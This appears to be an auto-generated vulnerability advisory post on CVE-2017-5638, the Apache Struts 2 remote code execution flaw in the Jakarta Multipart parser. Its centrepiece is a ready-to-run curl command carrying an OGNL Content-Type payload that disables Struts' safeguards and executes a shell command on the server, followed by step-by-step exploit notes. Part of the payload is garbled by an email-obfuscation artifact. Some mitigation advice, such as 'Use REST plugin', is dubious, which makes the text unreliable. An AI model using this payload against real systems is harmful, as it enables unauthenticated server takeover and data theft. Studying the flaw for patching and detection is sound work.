Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent with an HTTP request to a Struts-powered application. Improper exception handling during file upload parsing allows an attacker to inject Object-Graph Navigation Language (OGNL) expressions directly into the header. The Struts framework incorrectly evaluates these expressions, leading to the execution of arbitrary system commands on the server with the application’s privileges. This attack vector does not require any form of authentication, making it highly exploitable. The malicious OGNL payload is delivered within the `Content-Type` header string, which is processed before any file upload validation occurs.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-blank/example/HelloWorld.action

How Exploit:

Craft malicious Content-Type header.

Inject OGNL expression payload.

Send HTTP request.

Execute system commands.

Protection from this CVE:

Upgrade Struts immediately.

Apply official patch.

Use REST plugin.

Filter malicious requests.

Impact:

Remote Code Execution.

Full system compromise.

Data breach.

Service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top